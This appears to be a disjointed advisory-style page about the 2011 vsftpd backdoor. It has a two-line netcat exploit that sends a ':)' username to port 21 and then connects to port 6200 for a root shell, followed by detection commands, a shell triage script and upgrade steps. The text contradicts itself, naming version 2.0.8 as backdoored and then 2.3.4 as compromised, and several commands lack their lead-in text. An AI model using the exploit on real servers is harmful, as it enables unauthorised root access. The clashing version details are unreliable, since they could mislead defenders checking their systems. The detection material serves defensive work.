In July 2011, the official vsftpd (Very Secure FTP Daemon) project was compromised. Attackers replaced the legitimate source code of version 2.0.8 with a malicious version. This backdoored copy remained on the official download servers for several days before being discovered.
The backdoor allowed remote attackers to gain a root shell. Specifically, if a username containing :) was sent, the backdoor would open a command shell on port 6200.
A typical exploit was as simple as:
echo "USER :)" | nc target.com 21
nc target.com 6200
# root shell obtained
No authentication. No password. Just a smiley face and instant root access.
vsftpd -v
Or for a running process:
netstat -tulpn | grep :21
ps aux | grep vsftpd
If the version string shows 2.3.4, assume compromise.
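The checks above can be combined into one triage helper. This is an added example, not code from the original page or the vsftpd project: it flags the version string named above (2.3.4) and any TCP listener on port 6200 in netstat -tulpn output. The function names and sample inputs are constructed for illustration.

```shell
#!/bin/sh
# Added triage example; not from the original page or the vsftpd project.
FLAGGED_VERSION="2.3.4"   # version string the page says to treat as compromised
BACKDOOR_PORT=6200        # port the page says the backdoor shell opens on

# Pull the version out of `vsftpd -v` output or an FTP greeting banner.
vsftpd_version() {
    printf '%s\n' "$1" | tr 'A-Z' 'a-z' |
        sed -n 's/.*vsftpd[^0-9]*\([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Scan `netstat -tulpn` text for a TCP listener on the backdoor port.
# Prints "local-address pid/program" per hit; returns 0 only if one was found.
backdoor_listener() {
    printf '%s\n' "$1" | awk -v port="$BACKDOOR_PORT" '
        $1 ~ /^tcp/ && $6 == "LISTEN" {
            n = split($4, part, ":")          # copes with 0.0.0.0:6200 and :::6200
            if (part[n] == port) { print $4, $7; found = 1 }
        }
        END { exit(found ? 0 : 1) }'
}

# Combine both signals into one verdict line.
triage() {   # $1 = version or banner text, $2 = netstat -tulpn output
    ver=$(vsftpd_version "$1")
    if hit=$(backdoor_listener "$2"); then
        echo "ALERT: listener on port $BACKDOOR_PORT ($hit)"
    elif [ "$ver" = "$FLAGGED_VERSION" ]; then
        echo "SUSPECT: vsftpd $ver, assume compromise"
    else
        echo "OK: vsftpd ${ver:-unknown}, no listener on $BACKDOOR_PORT"
    fi
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_CLEAN='tcp   0   0 0.0.0.0:21     0.0.0.0:*   LISTEN   1234/vsftpd'
SAMPLE_HIT="$SAMPLE_CLEAN
tcp   0   0 0.0.0.0:6200   0.0.0.0:*   LISTEN   1240/vsftpd"

triage 'vsftpd: version 2.3.4' "$SAMPLE_HIT"
triage '220 (vsFTPd 2.3.4)'    "$SAMPLE_CLEAN"
triage 'vsftpd: version 3.0.5' "$SAMPLE_CLEAN"
```

A listener on port 6200 can belong to an unrelated service, so treat the ALERT line as a prompt to inspect the owning process rather than as proof on its own.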
For embedded systems or custom environments:
wget https://security.appspot.com/downloads/vsftpd-3.0.5.tar.gz
tar -xzf vsftpd-3.0.5.tar.gz
cd vsftpd-3.0.5
make
sudo make install